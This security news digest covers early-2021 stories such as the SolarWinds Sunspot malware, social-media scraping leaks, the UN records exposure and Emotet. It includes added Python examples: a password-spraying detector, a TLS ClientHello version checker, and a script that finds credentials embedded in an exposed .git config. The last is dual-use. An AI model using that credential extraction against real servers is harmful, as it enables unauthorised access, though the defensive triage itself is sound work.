News Items

  • news

"SolarWinds Hack Investigation Reveals New Sunspot Malware"

CrowdStrike researchers have revealed a new strain of malware called Sunspot, which the SolarWinds attackers used to inject the Sunburst backdoor into SolarWinds' Orion IT management software. Further investigation of the SolarWinds hack has also produced a new timeline for the intrusion, as well as customer support incidents believed to be related to Sunburst activity on customer infrastructure. According to CrowdStrike, Sunspot monitored running processes in SolarWinds' build environment so that the Sunburst code could be inserted while Orion was being built. The researchers also released details about the tactics, techniques, and procedures (TTPs) the attackers used to keep the malware persistent, to ensure that the code tampering did not cause build errors, and to prevent SolarWinds from detecting the operation. Sudhakar Ramakrishna, SolarWinds' new CEO, confirmed that the attackers conducted a test run in late 2019 to check that the company would not detect their later actions. Separately, an analysis of Sunburst found that its code resembles Kazuar, a .NET backdoor linked to the Russian Advanced Persistent Threat (APT) group Turla. The two strains use the same algorithm to calculate how long the malware stays dormant before its next command-and-control (C&C) connection, and the same algorithms for string obfuscation and for generating unique victim identifiers. This article continues to discuss the new Sunspot malware, the similarities between Kazuar and Sunburst, and other new findings surrounding the SolarWinds hack.

    Help Net Security reports "SolarWinds Hack Investigation Reveals New Sunspot Malware"

  • news

"Millions of Social Profiles Leaked by Chinese Data-Scrapers"

Researchers at Safety Detectives discovered a misconfigured Elasticsearch database owned by the Chinese social-media management company SocialArks that exposed 318 million records scraped from Facebook, Instagram, and LinkedIn: about 400GB of public and private profile data covering 214 million social media users worldwide. The research team determined that all of the leaked data had been scraped from the platforms, which is both unethical and a violation of Facebook's, Instagram's, and LinkedIn's terms of service. The scraped profiles comprised 11,651,162 Instagram profiles, 66,117,839 LinkedIn profiles, 81,551,567 Facebook profiles, and a further 55,300,000 Facebook profiles that were deleted within a few hours of the open server being discovered. The profile data in the database included biographies, profile pictures, follower counts, location settings, contact details such as email addresses and phone numbers, comment counts, frequently used hashtags, company names, job titles, and more. Most data scraping is carried out legally by web developers, business intelligence analysts, and other businesses, but when the scraped data is stored without adequate security, leaks affecting millions of people can result.

    Threatpost reports: "Millions of Social Profiles Leaked by Chinese Data-Scrapers"

  • news

"Why Older Adults Use (And Do Not Use) Password Managers"

A team of researchers from the George Washington University and the University of Maryland, Baltimore County, conducted a study exploring what motivates or prevents the adoption of password managers among adults over the age of 60. The team interviewed participants in three groups: those who use the password managers built into browsers or operating systems, those who use separately installed password managers, and those who do not use password managers at all. The study found that, among those who had not adopted one, security concerns outweighed the perceived benefits of a password manager: these older adults still consider their current method of storing passwords, such as writing them down, to be safe and easy. Those who do use password managers expressed satisfaction with the experience and feel confident using features such as the password generator and auto-fill. All three groups agreed that financial accounts were the most important to secure, since an attack on them could result in significant damage. The researchers also found that older adults who adopted a password manager reported a more positive experience than younger adults. This article continues to discuss the findings of the study on why older adults use or do not use password managers and how these findings differ from those of an earlier study on younger adults' password manager use.

    The George Washington University reports "Why Older Adults Use (And Do Not Use) Password Managers"

  • news

"How 5G and AI Are Creating an Architectural Revolution"

Intel Federal CTO Steve Orrin and Dell Federal CTO Cameron Chehreh have discussed the bottom-up transformation of IT by fifth-generation wireless technology (5G) and how this revolution will affect security. 5G will accelerate the digitization of everyday life, offering higher bandwidth, greater capacity, lower latency, and more. This next generation of mobile connectivity will improve the delivery of content-rich services such as 4K video and immersive augmented reality to smart devices. 5G will also make Machine-to-Machine (M2M) communications practical for enterprises, and it will underpin applications that use Artificial Intelligence (AI) and Machine Learning (ML) to turn raw data into real-time insights. It is essential to consider how 5G's dynamic, software-defined architecture can be secured; 5G security must cover not only the data but also the AI algorithms that operate on it. A 5G-enabled architecture therefore calls for a new security paradigm that takes a risk-based approach spanning the whole data lifecycle, including design, procurement, the supply chain, and the development process. This article continues to discuss how 5G is expected to transform IT from the bottom up, how these changes will affect security, and what approach should be taken to secure a 5G-enabled architecture.

    NextGov reports "How 5G and AI Are Creating an Architectural Revolution"

  • news

"CISA Insights on APT Compromise of Microsoft 365 Via Password Exploits"

The U.S. Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) issued an alert about the Advanced Persistent Threat (APT) actors behind the SolarWinds supply chain attack using compromised Microsoft 365 and Azure applications to access cloud resources. CISA is investigating incidents in which these threat actors may have gained initial access to victims' networks not through a compromised SolarWinds Orion product but through techniques such as password guessing, password spraying, or the exploitation of improperly secured administrative credentials. This article continues to discuss the latest CISA alert warning of the SolarWinds APT's use of compromised Microsoft 365 and Azure applications to reach cloud resources, as well as how organizations can defend themselves against the latest attacks detailed by Microsoft and CISA.

    HealthITSecurity reports "CISA Insights on APT Compromise of Microsoft 365 Via Password Exploits"
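The spraying technique named in the alert has a distinctive shape in sign-in logs: one source fails against many different accounts while no single account accumulates enough failures to trigger lockout, and the account that finally succeeds is the one to investigate. The Python below is an added example for this digest, not part of the article or of CISA's alert; the comma-separated log format, the thresholds, and the addresses and user names are constructed for illustration.

```python
"""Flag password-spraying sources in sign-in logs.

Spray signature: from one source, failures against many distinct accounts
inside a time window, with few failures per account (stays under lockout).
Brute force against a single account does not match and is left alone.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not real data): timestamp,user,source_ip,result
SAMPLE_LOG = """\
2021-01-05T09:00:01Z,alice@example.test,203.0.113.7,Failure
2021-01-05T09:00:04Z,bob@example.test,203.0.113.7,Failure
2021-01-05T09:00:07Z,carol@example.test,203.0.113.7,Failure
2021-01-05T09:00:10Z,dave@example.test,203.0.113.7,Failure
2021-01-05T09:00:13Z,erin@example.test,203.0.113.7,Failure
2021-01-05T09:00:16Z,frank@example.test,203.0.113.7,Success
2021-01-05T09:05:00Z,alice@example.test,198.51.100.22,Failure
2021-01-05T09:05:03Z,alice@example.test,198.51.100.22,Failure
2021-01-05T09:05:06Z,alice@example.test,198.51.100.22,Failure
2021-01-05T09:05:09Z,alice@example.test,198.51.100.22,Failure
2021-01-05T09:05:12Z,alice@example.test,198.51.100.22,Failure
2021-01-05T10:30:00Z,bob@example.test,192.0.2.10,Success
"""


def parse_events(text):
    """Parse the constructed CSV format into (time, user, source_ip, result) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, ip, result = line.split(",")
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), user.lower(), ip, result))
    return events


def detect_spraying(events, window=timedelta(minutes=60), min_accounts=5, max_per_account=3):
    """Return {source_ip: summary} for sources matching the spray signature.

    A source is flagged when, within any sliding `window` of its failures, at
    least `min_accounts` distinct users were tried and no user saw more than
    `max_per_account` failures. The summary also lists accounts that logged in
    successfully from the same source after the spray began (the follow-on to chase).
    """
    by_ip = defaultdict(list)
    for ts, user, ip, result in events:
        by_ip[ip].append((ts, user, result))

    flagged = {}
    for ip, evs in by_ip.items():
        evs.sort()
        failures = [(ts, u) for ts, u, r in evs if r == "Failure"]
        start = 0
        for end in range(len(failures)):
            # Slide the window start forward until it spans at most `window`.
            while failures[end][0] - failures[start][0] > window:
                start += 1
            per_user = defaultdict(int)
            for _, u in failures[start:end + 1]:
                per_user[u] += 1
            if len(per_user) >= min_accounts and max(per_user.values()) <= max_per_account:
                window_start = failures[start][0]
                flagged[ip] = {
                    "distinct_accounts": len(per_user),
                    "window_start": window_start.isoformat(),
                    "successes_after": sorted(
                        {u for ts, u, r in evs if r == "Success" and ts >= window_start}
                    ),
                }
    return flagged


if __name__ == "__main__":
    for ip, summary in detect_spraying(parse_events(SAMPLE_LOG)).items():
        print(ip, summary)
```

The thresholds are deliberately conservative; in a real tenant, tune `min_accounts` to the size of the user base and feed the detector from the sign-in log export rather than a string. The single-account burst from 198.51.100.22 is not flagged, which is the intended distinction between spraying and brute force.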

  • news

"Over 100,000 UN Employee Records Accessed by Researchers"

Security researchers at Sakura Samurai have revealed that it took them just hours to access over 100,000 personal records and credentials belonging to United Nations employees. The researchers were looking for bugs to report under the UN's vulnerability disclosure program. They initially found an exposed subdomain belonging to the International Labour Organization (ILO), a UN body, from which they retrieved Git credentials using the git-dumper tool; those credentials let them take over a legacy MySQL database and a survey management platform. These assets contained hardly anything of use, the researchers stated. They then discovered an exposed subdomain related to the United Nations Environment Programme (UNEP), a much bigger privacy risk, which was also leaking Git credentials. With the GitHub credentials they were able to download many private GitHub projects, and within those projects they found multiple sets of database and application credentials for the UNEP production environment. In total, the team discovered over 100,000 employee records, including names, ID numbers, gender, pay grade, travel records, work sub-areas and departments, evaluation reports, and funding source records.

    Infosecurity reports: "Over 100,000 UN Employee Records Accessed by Researchers"
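Once the files from an exposed .git directory of the kind the researchers found have been retrieved, triage is mechanical: the HEAD file confirms the response really is Git metadata rather than an error page, and the remote URLs in the config file are the usual place for embedded credentials to sit. The Python below is an added example, not the researchers' tooling and not git-dumper; the sample HEAD and config contents, the hostname and the token are constructed.

```python
"""Triage a retrieved .git directory: confirm it is Git metadata, then find credentials in remote URLs."""
import re
from urllib.parse import urlsplit

# .git/HEAD is either a symbolic ref or a bare 40-hex commit id (detached HEAD).
HEAD_PATTERN = re.compile(r"^(ref: refs/\S+|[0-9a-f]{40})$")

# Constructed sample contents (not any real organisation's files).
SAMPLE_HEAD = "ref: refs/heads/main\n"
SAMPLE_CONFIG = """\
[core]
\trepositoryformatversion = 0
\tbare = false
[remote "origin"]
\turl = https://deploy:s3cretT0ken@git.example.test/org/app.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
[remote "mirror"]
\turl = git@git.example.test:org/app.git
[branch "main"]
\tremote = origin
"""


def looks_like_git_head(body):
    """True when a fetched /.git/HEAD really is a Git HEAD file and not an HTML error page."""
    return bool(HEAD_PATTERN.match(body.strip()))


def parse_git_config(text):
    """Minimal reader for Git's INI-like config; yields (section, key, value)."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if "=" in line:
            key, _, value = line.partition("=")
            yield section, key.strip(), value.strip()


def find_embedded_credentials(config_text):
    """Return (section, username, redacted_url) for every remote URL that carries a password.

    scp-style remotes such as git@host:path have no URL authority, so urlsplit
    reports no password for them and they are correctly skipped.
    """
    findings = []
    for section, key, value in parse_git_config(config_text):
        if key != "url":
            continue
        parts = urlsplit(value)
        if parts.password:
            host = parts.hostname + (":%d" % parts.port if parts.port else "")
            redacted = "{}://{}:***@{}{}".format(parts.scheme, parts.username, host, parts.path)
            findings.append((section, parts.username, redacted))
    return findings


if __name__ == "__main__":
    print("HEAD ok:", looks_like_git_head(SAMPLE_HEAD))
    for finding in find_embedded_credentials(SAMPLE_CONFIG):
        print("credential in", *finding)
```

Redacting before logging matters here: the point of the check is to prove the exposure and rotate the secret, not to copy a live token into a ticketing system.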

  • news

"Malware Developers Refresh Their Attack Tools"

An analysis by the Cisco Talos research team further highlights the continued advancement of attack tools. Their developers are making malware increasingly difficult for defenders to detect and analyze, in part by increasing the complexity of infection chains. The researchers analyzed the latest version of LokiBot, an information stealer that targets credentials and other sensitive data, and found that its developers had added a third stage to its infection process as well as an additional layer of encryption to evade detection. The LokiBot campaign's techniques also include hiding code in images and using social engineering to trick victims into enabling macros in Microsoft Office. The growing sophistication of LokiBot and other malware calls for a multilayered approach to detecting attacks. This article continues to discuss the continued development of LokiBot to frustrate analysis and detection, the advancement of other malware strains, and the importance of a multilayered approach to the increasing sophistication of attack tools.

    Dark Reading reports "Malware Developers Refresh Their Attack Tools"

  • news

Anne Neuberger named as Deputy National Security Advisor for Cybersecurity in Biden administration

Anne Neuberger, currently director of the Cybersecurity Directorate at the NSA, has been named by President-Elect Biden to a new position on the National Security Council as deputy national security advisor for cybersecurity. The appointment signals a commitment to cybersecurity and its importance to national security, particularly in the wake of the SolarWinds hack.

  • news

"Emotet Tops Malware Charts in December After Reboot"

Check Point researchers found that the Emotet Trojan climbed from fifth place on the malware charts in November back to the top in December. Emotet accounted for 7% of malware infections globally after a spam campaign targeted more than 100,000 users per day over the holiday period; it is closely followed by the modular Trojan Trickbot and the info-stealer Formbook (both at 4%). Emotet has been updated with new malicious payloads and improved detection evasion; the latest version creates a dialogue box, which the researchers say helps it evade detection by users. The new spam campaign uses several delivery techniques, including embedded links, document attachments, and password-protected ZIP files. Emotet and Trickbot are often used in combination by ransomware groups to gain an initial foothold in networks.

    Infosecurity reports: "Emotet Tops Malware Charts in December After Reboot"

  • news

"FBI Warns of Egregor Attacks on Businesses Worldwide"

The FBI is warning private-sector companies of an increase in attacks using the Egregor ransomware, which has already compromised more than 150 organizations. Egregor is spread through phishing emails with malicious attachments and through exploitation of Remote Desktop Protocol (RDP) and VPN access. Once inside, Egregor affiliates have been observed using tools such as Cobalt Strike, Qakbot/Qbot, Advanced IP Scanner, and AdFind to escalate privileges and move laterally across the network, and tools such as Rclone and 7zip to exfiltrate data, according to the FBI.

    Threatpost reports: "FBI Warns of Egregor Attacks on Businesses Worldwide"

  • news

"Malspam Campaign Spoofs Email Chains to Install IcedID Info-Stealer"

The Unit 42 threat research team at Palo Alto Networks shared details of a new phishing campaign run by the cybercriminal group TA551, also known as Shathak, which is known for distributing information-stealing malware such as Ursnif, Valak, and IcedID. The campaign targets English-, German-, Italian-, and Japanese-speaking victims and primarily distributes IcedID via malicious macros. The emails carry password-protected ZIP archives containing Word documents; once the recipient opens the document and enables its macros, the infection chain begins and IcedID is installed on the victim's system. According to the research team, TA551's malspam spoofs legitimate email chains by reusing genuine messages harvested from email clients on previously infected Windows hosts. This article continues to discuss recent findings on the new TA551 malspam campaign that spoofs email chains to distribute IcedID, and other observed changes in the group's traffic patterns and infections.

    SC Media reports "Malspam Campaign Spoofs Email Chains to Install IcedID Info-Stealer"

  • news

"Credit Card Data of 10,000 American Express Accounts Posted on Darknet Forum for Free"

The threat intelligence analyst Bank Security has drawn attention to the leak of data belonging to more than 10,000 Mexico-based American Express credit cardholders by a threat actor on an underground hacking forum. The same actor also claimed to hold data on Mexican banking customers of Santander and Banamex. According to Bank Security, the leaked data contains credit card numbers, names, phone numbers, full addresses, birth dates, membership reward details, and other personally identifiable information (PII). American Express released a statement saying that its card members will not be held liable for fraudulent charges on their accounts, and that it has sophisticated monitoring systems and internal safeguards in place to detect fraudulent and suspicious activity. The leaked data could be used for phishing attacks and telephone scams. This article continues to discuss the leaked sample data set exposing sensitive information about Mexico-based American Express cardholders, the card company's response, the malicious activities the data could enable, and how American Express cardholders can protect themselves.

    CISO MAG reports "Credit Card Data of 10,000 American Express Accounts Posted on Darknet Forum for Free"

  • news

"Vulnerabilities in Fortinet WAF Can Expose Corporate Networks to Attacks"

Fortinet has released advisories for potentially serious vulnerabilities in its FortiWeb Web Application Firewall (WAF). According to Andrey Medov, the lead security researcher at Positive Technologies who discovered the flaws, their exploitation could expose corporate networks to attack. The FortiWeb administration interface is affected by buffer overflows and a blind SQL injection that could allow threat actors to cause a Denial of Service (DoS) or to execute unauthorized code or commands. This article continues to discuss the discovery, disclosure, and potential impact of the vulnerabilities in the FortiWeb administration interface.

    Security Week reports "Vulnerabilities in Fortinet WAF Can Expose Corporate Networks to Attacks"

  • news

"Hackers Target Cryptocurrency Users With New ElectroRAT Malware"

The security firm Intezer Labs discovered a malware operation in which cybercriminals created fake cryptocurrency apps carrying a new malware strain called ElectroRAT, written in the open-source programming language Go. The campaign was found in December 2020 but is believed to have been spreading malware since January 8, 2020. According to Intezer Labs, the operators rely on three cryptocurrency-related apps named Jamm, eTrade/Kintum, and DaoPoker, each hosted on its own website; the first two claim to let users trade cryptocurrency, while the third is a gambling app. ElectroRAT aims to drain cryptocurrency wallets on Windows, Linux, and macOS. The malware is highly intrusive: it can log keystrokes, take screenshots, download files, execute commands on the victim's console, and more. Intezer Labs estimates that the operation has infected at least 6,500 users. This article continues to discuss the discovery, distribution, and capabilities of the ElectroRAT malware targeting cryptocurrency users, as well as the growing popularity of Go among malware authors.

    ZDNet reports "Hackers Target Cryptocurrency Users With New ElectroRAT Malware"

  • news

"PayPal Users Targeted in New SMS Phishing Campaign"

A new SMS-based phishing campaign is attempting to steal PayPal users' account credentials and other sensitive information, according to BleepingComputer. The text message impersonates the payment processor and tells potential victims that their account has been "permanently limited" and that they need to click a link to verify their identity. At first glance the message is not implausible, because PayPal does impose limits when it suspects that an unauthorized third party has accessed an account, when it detects high-risk activity on an account, or when a user has violated its Acceptable Use Policy. Victims who click the link are taken to a phishing page that requests their login credentials. Should the victim "log in," the credentials are sent to the scammers, and the fraudulent page then attempts to gather further information, including the victim's full name, date of birth, address, and bank details. PayPal is one of the most-spoofed brands in phishing scams.

WeLiveSecurity reports "PayPal Users Targeted in New SMS Phishing Campaign"

  • news

"Google Warns of Critical Android Remote Code Execution Bug"

Google's latest Android security update addresses 43 bugs affecting Android handsets, including Samsung phones. One critical-severity flaw fixed in this update is CVE-2021-0316, a remote code execution flaw in Android's System component, the core of the Android operating system. According to Google, the flaw could allow an adversary using a specially crafted transmission to execute arbitrary code within the context of a privileged process. Another critical-severity flaw, CVE-2021-0313, is a denial-of-service issue in the Android Framework component, the set of APIs that lets developers write apps for Android phones quickly and easily. Both critical flaws are fixed in Android versions 8.0, 8.1, 9, 10, and 11. The article continues to discuss the other bugs fixed by the update.

    Threatpost reports: "Google Warns of Critical Android Remote Code Execution Bug"

  • news

Pub Crawl #45


Pub Crawl summarizes, by hard problems, sets of publications that have been peer reviewed and presented at SoS conferences or referenced in current work. The topics are chosen for their usefulness to current researchers.

  • news

"NSA Releases Guidance on Obsolete Encryption Tools"

The National Security Agency (NSA) released guidance for the Department of Defense, other U.S. federal agencies, and supporting contractors on replacing obsolete Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocol versions used to encrypt network traffic. Using deprecated versions of TLS or SSL leaves sessions vulnerable to decryption and sensitive data exposure. NSA recommends that organizations use only TLS 1.2 or TLS 1.3, and avoid SSL 2.0, SSL 3.0, TLS 1.0, and TLS 1.1, which are now obsolete. The guidance also covers detection strategies that network security analysts can apply to identify the use of obsolete TLS versions, cipher suites, and more. This article continues to discuss NSA's recommendations on replacing old TLS and SSL protocol versions, in addition to past findings on how threat actors circumvent TLS encryption or weaponize the protocol.

BankInfoSecurity reports "NSA Releases Guidance on Obsolete Encryption Tools"
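The detection side of the guidance starts with knowing which versions a client is actually willing to negotiate, and that cannot be read from the record header alone: a TLS 1.3 client puts 0x0303 (TLS 1.2) in the legacy version field and lists its real offers in the supported_versions extension, while an old client has no such extension and its legacy field is the truth. The Python below is an added example for this digest, not part of the NSA guidance or the article; it parses a ClientHello record, such as one carved from a capture, and names any obsolete versions on offer. The ClientHello bytes it runs against are constructed by the helper in the block, and GREASE values (random placeholder versions some clients send) are skipped.

```python
"""Report the protocol versions a TLS client offers in its ClientHello and flag obsolete ones."""
import struct

VERSION_NAMES = {
    0x0300: "SSL 3.0", 0x0301: "TLS 1.0", 0x0302: "TLS 1.1",
    0x0303: "TLS 1.2", 0x0304: "TLS 1.3",
}
OBSOLETE = {0x0300, 0x0301, 0x0302}   # SSL 2.0 uses a different record format and is not parsed here
EXT_SUPPORTED_VERSIONS = 0x002B


def _is_grease(v):
    # GREASE values (RFC 8701) look like 0x0A0A, 0x1A1A, ... and carry no meaning.
    return (v & 0x0F0F) == 0x0A0A and (v >> 8) == (v & 0xFF)


def offered_versions(record):
    """Return the protocol versions a ClientHello record offers, most preferred first."""
    if len(record) < 5 or record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    rec_len = struct.unpack(">H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if len(hs) < 4 or hs[0] != 0x01:
        raise ValueError("not a ClientHello")
    hs_len = int.from_bytes(hs[1:4], "big")
    body = hs[4:4 + hs_len]

    legacy_version = struct.unpack(">H", body[0:2])[0]
    pos = 2 + 32                                            # skip client random
    sid_len = body[pos]; pos += 1 + sid_len                 # session id
    cs_len = struct.unpack(">H", body[pos:pos + 2])[0]; pos += 2 + cs_len   # cipher suites
    comp_len = body[pos]; pos += 1 + comp_len               # compression methods
    if pos >= len(body):                                    # no extensions: pre-1.3 client
        return [legacy_version]

    ext_len = struct.unpack(">H", body[pos:pos + 2])[0]; pos += 2
    end = pos + ext_len
    while pos + 4 <= end:
        etype, elen = struct.unpack(">HH", body[pos:pos + 4]); pos += 4
        edata = body[pos:pos + elen]; pos += elen
        if etype == EXT_SUPPORTED_VERSIONS:
            n = edata[0]                                    # length of the version list in bytes
            versions = [struct.unpack(">H", edata[i:i + 2])[0] for i in range(1, 1 + n, 2)]
            return [v for v in versions if not _is_grease(v)]
    return [legacy_version]                                 # extensions present but no supported_versions


def obsolete_offers(record):
    """Names of the obsolete versions the client is willing to negotiate (empty when compliant)."""
    return [VERSION_NAMES.get(v, hex(v)) for v in offered_versions(record) if v in OBSOLETE]


def build_client_hello(legacy_version, supported_versions=None):
    """Construct a minimal ClientHello for testing: zero random, no session id, two cipher suites."""
    body = struct.pack(">H", legacy_version) + b"\x00" * 32
    body += b"\x00"                                         # empty session id
    suites = struct.pack(">HH", 0x1301, 0xC02F)
    body += struct.pack(">H", len(suites)) + suites
    body += b"\x01\x00"                                     # one compression method: null
    if supported_versions is not None:
        vs = b"".join(struct.pack(">H", v) for v in supported_versions)
        ext = struct.pack(">HH", EXT_SUPPORTED_VERSIONS, 1 + len(vs)) + bytes([len(vs)]) + vs
        body += struct.pack(">H", len(ext)) + ext
    hs = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack(">H", len(hs)) + hs


if __name__ == "__main__":
    for label, hello in [
        ("legacy TLS 1.0 client", build_client_hello(0x0301)),
        ("TLS 1.3 client", build_client_hello(0x0303, [0x0A0A, 0x0304, 0x0303])),
        ("permissive client", build_client_hello(0x0303, [0x0304, 0x0303, 0x0302, 0x0301])),
    ]:
        print(label, "->", obsolete_offers(hello) or "compliant")
```

A server-side check is the mirror image: the negotiated version in the ServerHello is what actually protected the session, so both ends of the handshake are worth logging when hunting for TLS 1.0 and 1.1 still in use.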

  • news

CISE announces collaboration of joint proposals to NSF and Academy of Finland

    CISE has announced a collaboration program for joint proposals to NSF and the Academy of Finland. See https://www.nsf.gov/pubs/2021/nsf21035/nsf21035.jsp?WT.mc_id=USNSF_25&WT.mc_ev=click. Proposals may be submitted to CISE Core programs, specifically in the areas of artificial intelligence and/or wireless communication technologies.

    Please note: SaTC is NOT participating in this program.

  • news

SoS Musings #44 - Industrial Robots and Cybersecurity


  • news

Cyber Scene #51 - The Viral Cyber Pandemic


  • news

Challenges for Digital Proximity Detection in Pandemics: Privacy, Accuracy, and Impact

    NIST is holding a virtual workshop on Challenges for Digital Proximity Detection in Pandemics: Privacy, Accuracy, and Impact, during January 26, 2021 - January 28, 2021, 10:00am - 3:30pm EST.

    To learn more and register, visit: https://www.nist.gov/news-events/events/2021/01/challenges-digital-proximity-detection-pandemics-privacy-accuracy-and

  • news

Cybersecurity Snapshots #13 - Are IoT Devices Secure?


  • news

Spotlight on Lablet Research #13 - Multi-Model Testbed for the Simulation-Based Evaluation of Resilience


  • news

"US Investigators Say SolarWinds Hack is 'Likely Russian in Origin'"

After an intensive investigation, U.S. government agencies have concluded that the espionage operation that used tampered SolarWinds software was most likely Russian in origin, and that it was targeted. The malicious software update went to some 18,000 government and private-sector customers, but the FBI stated that fewer than 10 U.S. government agencies were compromised by follow-on activity on their systems. Russia has denied involvement in the SolarWinds operation. The adversaries behind the campaign have challenged the defenses of America's biggest tech and cybersecurity firms: they were able to view Microsoft's source code, and they stole the tools that FireEye uses to test its clients' defenses.

    Cyberscoop reports: "US Investigators Say SolarWinds Hack is 'Likely Russian in Origin'"

  • news

"Ransomware Surge Drives 45% Increase in Healthcare Cyberattacks"

According to the security vendor Check Point, healthcare organizations (HCOs) worldwide were targeted by cyberattacks significantly more than other sectors from the beginning of November to the end of 2020, with a 45% increase in attacks against the sector. Attack volume was highest in November, when HCOs experienced more than 600 attacks per week per organization on average. HCOs suffered a variety of attacks, including ransomware, botnets, remote code execution, and Distributed Denial of Service (DDoS), but ransomware showed the largest increase and poses the greatest threat. Ryuk and Sodinokibi (REvil) were cited as the most prolific ransomware families. Check Point also reported that Central Europe saw the highest increase in attacks on HCOs, followed by East Asia and Latin America. This article continues to discuss Check Point's findings on the rise in healthcare cyberattacks, including common attack types, targets, and tactics, and what organizations can do to prevent them.

    Infosecurity Magazine reports "Ransomware Surge Drives 45% Increase in Healthcare Cyberattacks"

  • news

"Ransomware Gang Collects Data from Blood Testing Lab"

Apex Laboratory, which provides at-home blood work for patients in New York City, Long Island, and South Florida, has disclosed that it was hit by a ransomware attack on July 25. A forensic investigation that concluded on December 15 determined that the attackers had gained access to patient data and had posted information about the attack on their leak blog. According to Apex, the data obtained includes patient names, dates of birth, test results, and, for some individuals, Social Security numbers and phone numbers. The information was likely taken from Apex's systems between July 21 and July 25 as part of a "double extortion" attack, in which criminals both lock up systems and exfiltrate data so they can threaten to publish it.

    Threatpost reports: "Ransomware Gang Collects Data from Blood Testing Lab"

  • news

"Researchers Fool reCAPTCHA With Google's Own Speech-To-Text Service"

CAPTCHA is a security mechanism widely used on the internet to protect websites against automated bots by presenting image, audio, or text challenges that help distinguish human input from machine input. Researchers have attempted to break it using reverse image search, deep learning, and experimental neuroscience. Now researchers at the University of Maryland (UMD) have developed a CAPTCHA-breaking method called unCAPTCHA, which they claim defeats Google's reCAPTCHA, one of the most popular systems and one used by thousands of websites, with a high success rate. unCAPTCHA turns Google's free speech-to-text service against Google's own CAPTCHA system. This article continues to discuss the concept of CAPTCHA, the unCAPTCHA method developed by UMD researchers to break Google's reCAPTCHA, and Google's response to the new attack.

    Motherboard reports "Researchers Fool reCAPTCHA With Google's Own Speech-To-Text Service"

  • news

"Leading Game Publishers Hit Hard by Leaked-Credential Epidemic"

Researchers at KELA have found stolen credentials tied to the top 25 gaming firms, including Ubisoft. In a recent scan, the researchers found about 1 million compromised credentials associated with the wider gaming universe of clients and employees, both in caches of breached data posted online and for sale on criminal marketplaces. Gaming is a $196 billion industry, and its growing success has drawn the attention of cybercriminals scouting for new targets; the researchers suggest that the industry may not prioritize its security precautions. In 2020 gamers faced foul play ranging from identity theft and scams to the theft of in-game valuables.

    Threatpost reports: "Leading Game Publishers Hit Hard by Leaked-Credential Epidemic"

  • news

"Microsoft Says SolarWinds Hackers Accessed Company Source Code"

Microsoft recently revealed that the hackers behind the SolarWinds Orion software supply chain attack were able to access company source code. Detection and review of unusual activity on some internal accounts led to the discovery of one account that had been used to view source code in several repositories. Further investigation confirmed that the account made no changes, as it did not have permission to modify code or engineering systems. This article continues to discuss the initial reports and new findings on the impact of the SolarWinds supply chain attack on Microsoft, in addition to Microsoft's approach to source code.

    CyberScoop reports "Microsoft Says SolarWinds Hackers Accessed Company Source Code"

  • news

"This Top VPN Has an Unfortunate Backdoor Security Flaw"

Researchers at the Dutch cybersecurity firm Eye Control recently discovered a backdoor account affecting about 100,000 Zyxel devices, including Advanced Threat Protection appliances, VPN gateways, and the company's NXC series of access point controllers. The hardcoded account grants attackers root access to Zyxel VPN gateways, firewalls, and Access Point (AP) controllers. The backdoor was introduced in a recent firmware update for several Zyxel firewalls and AP controllers; according to the researchers, the account's username and password are visible in plain text in the system binaries of firmware ZLD V4.60, and the credentials work on both the SSH and web interface. This article continues to discuss the admin-level backdoor discovered in Zyxel security products.

    TechRadar reports "This Top VPN Has an Unfortunate Backdoor Security Flaw"

  • news

"T-Mobile Faces Yet Another Data Breach"

T-Mobile USA has reported a data breach that occurred last week via its website, its fourth data breach in three years. The data accessed is customer proprietary network information (CPNI), which the Federal Communications Commission describes as some of the most sensitive personal information that carriers and providers hold about their customers. CPNI includes records of which phone numbers users called; the frequency, duration, and timing of those calls; and any services purchased by the customer. The attacker did not gain access to account names, physical or email addresses, financial data, credit card information, Social Security numbers, tax IDs, passwords, or PINs. T-Mobile stated that about 0.2 percent of customers (around 200,000 people) were affected. The article continues to discuss the three earlier breaches T-Mobile USA has suffered.

    Threatpost reports: "T-Mobile Faces Yet Another Data Breach"

  • news

    Visible to the public Worst Hacks of 2020

    Start 2021 with a review of the worst hacks of 2020. From the SolarWinds supply chain hack to the takeover of high-profile Twitter accounts, it was a year of cybersecurity challenges.

    https://www.wired.com/story/worst-hacks-2020-surreal-pandemic-year/

  • news

    Visible to the public "Government Security Experts Issue Farmers with New Advice"

    The UK's National Cyber Security Centre (NCSC) has issued cybersecurity guidance for farmers as the cyberthreats facing rural businesses continue to grow. The guide, titled "Cybersecurity for Farmers," outlines best practices for recognizing suspicious emails, managing passwords, securing devices, backing up data, and more. The increased use of automated machinery, smart security cameras, and software for back-office management and productivity prompted the guide, since these technologies have made the agriculture sector a more attractive target for cybercriminals. Cyberattacks on agricultural businesses can expose confidential data and cause significant financial losses. Stuart Roberts, the National Farmers Union deputy president, emphasized farmers' growing reliance on technology and cybercriminals' growing sophistication in exploiting vulnerabilities in that technology to steal money, data, and passwords. Suggestions for farmers include regularly patching software, replacing end-of-life (EOL) operating systems, applying encryption tools, and using firewalls. This article continues to discuss the importance and contents of the NCSC's first-ever farmer-oriented cybersecurity guidance.

    Infosecurity Magazine reports "Government Security Experts Issue Farmers with New Advice"

  • news

    Visible to the public "Whirlpool Hit With Ransomware Attack"

    The major appliances giant Whirlpool has acknowledged that it was hit with a ransomware attack in November. Whirlpool stated that it is unaware of any consumer information being exposed by the attack and that the ransomware is not causing any operational difficulties at this time. The attack was attributed to the Nefilim ransomware group. Emsisoft threat analysts found that the group had posted two files to its "wall of shame" leak site containing information it claims was taken from Whirlpool. Nefilim is best known for targeting organizations that use unpatched or poorly secured Citrix remote-access technology, then stealing data, deploying crypto-locking malware, and threatening to publicly dump the exfiltrated data to force payment. In June, New Zealand's CERT stated that organizations hit by a typical Nefilim attack would see files with a .NEFILIM extension, a ransom note named NEFILIM-DECRYPT.txt placed on affected systems, and batch files created in C:\Windows\Temp.

